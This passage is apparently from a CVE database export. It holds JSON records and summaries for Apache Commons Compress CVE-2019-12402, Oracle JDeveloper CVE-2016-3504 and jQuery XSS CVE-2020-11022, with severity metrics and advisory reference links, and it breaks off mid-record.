"https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E", }, { name: "[brooklyn-dev] 20200403 [GitHub] [brooklyn-server] nakomis opened a new pull request #1089: Bumps commons-compress version", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53%40%3Cdev.brooklyn.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_transferred", ], url: "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b%40%3Cdev.commons.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20230818-0001/", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Commons Compress", vendor: "Apache Software Foundation", versions: [ { status: "affected", version: "1.15 to 1.18", }, ], }, ], descriptions: [ { lang: "en", value: "The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.", }, ], problemTypes: [ { descriptions: [ { description: "denial of service vulnerability", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2023-08-18T13:06:40.207792", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { name: "[creadur-commits] 20191022 [creadur-rat] branch master updated: RAT-258: Update to latest commons-compress to fix CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea%40%3Ccommits.creadur.apache.org%3E", }, { name: "FEDORA-2019-c96a8d12b0", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7/", }, { name: "FEDORA-2019-da0eac1eb6", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL/", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] nielsbasjes opened a new pull request #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] flinkbot edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200306 [GitHub] [flink] flinkbot commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200310 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] nielsbasjes commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] flinkbot edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200311 [GitHub] [flink] nielsbasjes edited a comment on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200312 [GitHub] [flink] zentol commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200312 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] GJL commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] zentol commented on issue #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200313 [GitHub] [flink] GJL closed pull request #11333: [FLINK-14121] Update commons-compress because of CVE-2019-12402", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0%40%3Cissues.flink.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 Re: CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E", }, { name: "[brooklyn-dev] 20200403 [GitHub] [brooklyn-server] nakomis opened a new pull request #1089: Bumps commons-compress version", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53%40%3Cdev.brooklyn.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { url: "https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b%40%3Cdev.commons.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { url: "https://security.netapp.com/advisory/ntap-20230818-0001/", }, ], }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2019-12402", datePublished: "2019-08-29T00:00:00", dateReserved: "2019-05-28T00:00:00", dateUpdated: "2024-08-04T23:17:39.992Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2016-3504
Vulnerability from cvelistv5
Published
2016-07-21 10:00
Modified
2024-10-11 20:52
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, and 12.2.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to ADF Faces.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/91787 | vdb-entry, x_refsource_BID | |
| http://www.securitytracker.com/id/1036370 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/bid/92023 | vdb-entry, x_refsource_BID |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T23:56:14.101Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { name: "91787", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/91787", }, { name: "1036370", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1036370", }, { name: "92023", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/92023", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2016-3504", options: [ { Exploitation: "none", }, { Automatable: "yes", }, { "Technical Impact": "total", }, ], role: "CISA Coordinator", timestamp: "2024-10-11T20:26:03.921963Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-11T20:52:29.504Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2016-07-19T00:00:00", descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, and 12.2.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to ADF Faces.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2017-08-31T09:57:01", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { name: "91787", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/91787", }, { name: "1036370", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1036370", }, { name: "92023", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/92023", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2016-3504", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, and 12.2.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to ADF Faces.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { name: "91787", refsource: "BID", url: "http://www.securityfocus.com/bid/91787", }, { name: "1036370", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1036370", }, { name: "92023", refsource: "BID", url: "http://www.securityfocus.com/bid/92023", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2016-3504", datePublished: "2016-07-21T10:00:00", dateReserved: "2016-03-17T00:00:00", dateUpdated: "2024-10-11T20:52:29.504Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2020-11022
Vulnerability from cvelistv5
Published
2020-04-29 00:00
Modified
2024-08-04 11:21
Severity ?
EPSS score ?
Summary
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T11:21:14.453Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "DSA-4693", tags: [ "vendor-advisory", "x_transferred", ], url: "https://www.debian.org/security/2020/dsa-4693", }, { name: "FEDORA-2020-11be4b36d4", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/", }, { name: "FEDORA-2020-36d2db5f51", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_transferred", ], url: "https://jquery.com/upgrade-guide/3.5/", }, { tags: [ "x_transferred", ], url: "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2", }, { tags: [ "x_transferred", ], url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { tags: [ "x_transferred", ], url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { tags: [ "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20200511-0006/", }, { tags: [ "x_transferred", ], url: "https://www.drupal.org/sa-core-2020-002", }, { name: "openSUSE-SU-2020:1060", tags: [ "vendor-advisory", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { name: "GLSA-202007-03", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202007-03", }, { name: "openSUSE-SU-2020:1106", tags: [ "vendor-advisory", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { name: "[airflow-commits] 20200820 [GitHub] [airflow] breser opened a new issue #10429: jquery dependency needs to be updated to 3.5.0 or newer", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3Ccommits.airflow.apache.org%3E", }, { name: "FEDORA-2020-fbb94073a1", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/", }, { name: "FEDORA-2020-0b32a59b54", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/", }, { name: "FEDORA-2020-fe94df8c34", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "[flink-issues] 20201105 [jira] [Created] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-dev] 20201105 [jira] [Created] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E", }, { name: "openSUSE-SU-2020:1888", tags: [ "vendor-advisory", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { name: "[flink-issues] 20201129 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2020-11", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2020-10", }, { name: "[flink-issues] 20210209 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210209 [jira] [Comment Edited] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E", }, { name: "[debian-lts-announce] 20210326 [SECURITY] [DLA 2608-1] jquery security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { name: "[flink-issues] 20210422 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210422 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210429 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210429 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2021-10", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2021-02", }, { tags: [ "x_transferred", ], url: "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { name: "[flink-issues] 20211031 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { name: "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "jQuery", vendor: "jquery", versions: [ { status: "affected", version: ">= 1.2, < 3.5.0", }, ], }, ], descriptions: [ { lang: "en", value: "In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.9, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2023-08-31T02:06:33.630688", orgId: "a0819718-46f1-4df5-94e2-005712e83aaa", shortName: "GitHub_M", }, references: [ { name: "DSA-4693", tags: [ "vendor-advisory", ], url: "https://www.debian.org/security/2020/dsa-4693", }, { name: "FEDORA-2020-11be4b36d4", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/", }, { name: "FEDORA-2020-36d2db5f51", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/", }, { url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { url: "https://jquery.com/upgrade-guide/3.5/", }, { url: "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2", }, { url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { url: "https://security.netapp.com/advisory/ntap-20200511-0006/", }, { url: "https://www.drupal.org/sa-core-2020-002", }, { name: "openSUSE-SU-2020:1060", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { name: "GLSA-202007-03", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202007-03", }, { name: "openSUSE-SU-2020:1106", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { name: "[airflow-commits] 20200820 [GitHub] [airflow] breser opened a new issue #10429: jquery dependency needs to be updated to 3.5.0 or newer", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3Ccommits.airflow.apache.org%3E", }, { name: "FEDORA-2020-fbb94073a1", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/", }, { name: "FEDORA-2020-0b32a59b54", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/", }, { name: "FEDORA-2020-fe94df8c34", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/", }, { url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "[flink-issues] 20201105 [jira] [Created] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-dev] 20201105 [jira] [Created] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E", }, { name: "openSUSE-SU-2020:1888", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { name: "[flink-issues] 20201129 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { url: "https://www.tenable.com/security/tns-2020-11", }, { url: "https://www.tenable.com/security/tns-2020-10", }, { name: "[flink-issues] 20210209 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210209 [jira] [Comment Edited] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E", }, { name: "[debian-lts-announce] 20210326 [SECURITY] [DLA 2608-1] jquery security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { name: "[flink-issues] 20210422 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210422 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210429 [jira] [Commented] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20210429 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { url: "https://www.tenable.com/security/tns-2021-10", }, { url: "https://www.tenable.com/security/tns-2021-02", }, { url: "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html", }, { url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { name: "[flink-issues] 20211031 [jira] [Updated] (FLINK-20014) Resolve CVE-2020-11022 and CVE-2020-11023 in 